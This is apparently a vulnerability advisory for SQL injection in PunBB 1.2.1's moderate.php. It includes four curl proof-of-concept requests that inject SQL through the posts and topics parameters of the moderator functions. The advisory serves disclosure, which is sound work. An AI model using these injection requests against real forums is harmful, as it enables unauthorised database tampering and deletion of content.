============================================== SQL Injections in punbb-1.2.1 moderate.php ============================================== Description ----------- Improper handling of several arguments in moderate.php allows a malicious moderator (or admin) to inject arbitrary SQL statements. This also affects systems using the magic_quotes_gpc option in php.ini. Proof of concept ---------------- These examples will not do anything malicious or even cause the system to report an error. Instead they are crafted such that by simply adding a ; or ' just before the comment "-- this won't show" will cause the SQL query to crash demonstrating the injection is possible. Assumptions: - punbb_cookie contains identification of a moderator for forum with id 1. Attacks delete posts: curl --referer http://target/moderate.php --form posts="0) -- this won't show" --form delete_posts_comply=1 --cookie punbb_cookie= target/moderate.php?fid=1\&tid=1 Attacks move topics: curl --referer http://target/moderate.php --form topics="2) -- this won't show" --form move_to_forum=2 --form move_topics=1 --form move_topics_to=1 --cookie punbb_cookie= target/moderate.php?fid=1 Attacks delete topics: curl --referer http://target/moderate.php --form topics="2) -- this won't show" --form delete_topics=1 --form delete_topics_comply=1 --cookie punbb_cookie= target/moderate.php?fid=1 Attacks open/close: curl --referer http://target/moderate.php --form "topics[0) -- this won't show]"= --form open=1 --cookie "punbb_cookie= target/moderate.php?fid=1